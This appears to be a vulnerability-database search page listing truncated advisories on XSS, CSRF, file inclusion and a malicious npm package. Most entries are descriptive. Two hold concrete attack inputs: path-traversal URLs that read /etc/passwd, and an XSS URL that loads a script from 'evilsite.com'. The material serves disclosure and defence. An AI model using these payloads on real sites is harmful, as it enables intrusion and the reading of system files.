14 matches found
Malicious Package
Overview: @vtim/xss-poc is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
Malicious code in @vtim/xss-poc (npm)
Source: amazon-inspector 947e0af0661087703ab13fc4220ceff05dafffb94addd8243f90a86929beaf3c The package @vtim/xss-poc was found to contain malicious code. Source: ghsa-malware 20e54e730a6708f44f0828a03bf7ac5c9fb2c88074659d45570d90af289eca84...
MAL-2026-1440 Malicious code in @vtim/xss-poc (npm)
Source: amazon-inspector 947e0af0661087703ab13fc4220ceff05dafffb94addd8243f90a86929beaf3c The package @vtim/xss-poc was found to contain malicious code. Source: ghsa-malware 20e54e730a6708f44f0828a03bf7ac5c9fb2c88074659d45570d90af289eca84...
Logo Slider < 4.0.0 - Contributor+ Stored XSS
Description: The plugin does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. 1. Using a contributor account, add a Logo Slider using the Shortco...
Floating Chat Widget < 3.1.9 - Editor+ Stored XSS
Description: The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks, even when the unfilteredhtml capability is disallowed (for example in a multisite setup). 1. Go to "Chaty New Widget" 2. Create ...
Radancy: Admin account/panel takeOver and Doing actions in admin panel via DOM-based XSS
Hello team, I found a DOM-XSS in your https://████████/ Webmail Admin Panel that allows an attacker to steal sensitive admin info and perform any action in your webmail admin panel. Why and how this vulnerability happens: - If you review the source code of this endpoint of the admin panel "...
Automattic: [intensedebate.com] XSS Reflected POST-Based on update/tumblr2/{$id}
Summary: Hello, I have found a Reflected POST-based XSS on https://www.intensedebate.com/update/tumblr2/$id. The parameter $_POST['txtCode'] is reflected and is not sanitized. To trigger the XSS, an attacker needs to create a site, invite the victim to their own site and give them full permissions...
NodCMS Cross Site Request Forgery
Exploit Title: NodCMS Cross Site Request Forgery; Author: Ashiyane Digital Security Team; Google Dork: -; Date: 29/10/2016; Type: webapps; Platform: PHP; Vendor Homepage: http://www.nodcms.com/en; Software link: https://github.com/khodakhah/nodcms/archive/master.zip; CSRF PoC create User:...
Horde 5.1.2 Cross Site Request Forgery / Cross Site Scripting
Exploit Title: CSRF Horde Groupware Webmail Edition; Author: Marcela Benetrix; Date: 10/28/13; Version: 5.1.2; Software link: http://www.horde.org/apps/webmail Groupware Webmail Edition. Horde Groupware Webmail Edition is a free, enterprise-ready, browser-based communication suite. Users can read, se...
Hivemail Webmail 1.41F Build 103 Cross Site Scripting
#!/usr/bin/python ''' Exploit Title: Hivemail Webmail Multiple Stored XSS issues; Date: 16/08/2012; Exploit Author: Shai rod @NightRang3r; Vendor Homepage: http://www.hivemail.com/; Software Link: http://www.hivemail.com/data/HM141F103.rar; Version: 1.41F Build 103; Gr33Tz: @aviadgolan, @benhayak,...
WSN Classifieds 6.2.12 / 6.2.18 Cross Site Scripting / SQL Injection
Exploit Title: WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities; Script Page: http://www.wsnclassifieds.com; Date: 1-12-2011; Author: RandomStorm - http://www.randomstorm.com, Avram Marius Gabriel (d3v1l); Tested on: Windows XP & Vista, IE9, Firefox 8.0. Note: Redirect and HTML Injection can ...
WordPress bSuite 4.0.7 Cross Site Scripting
Original advisory: http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/ WordPress bSuite Add Admin. Download link: http://wordpress.org/extend/plugins/bsuite/ Author contact: 29/06/2011; POC published: 11/07/2011. The plugin is out of date (last updated in 2009), so this is just a POC that show...
FreeWebshop <=2.2.2 [local file include & xss]
FreeWebshop <=2.2.2; severity: high; vendor site: http://www.freewebshop.org/; impact: an anonymous user can access any file on the remote server. PoC: http://site.com/?page=../../../../../../../../../../etc/passwd00 http://site.com/index.php?page=../../../../../../../../../../etc/passwd00 xss get:...
Ez Ringtone Manager from scriptez.net - XSS
Ez Ringtone Manager. Homepage: http://www.scriptsez.net Affected files: player.php, search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=SCRIPT20SRC=http://evilsite.com/xss.js/SCRIPT&cat=LG20Mobiles The search box doesn't properly filter user input. Tags...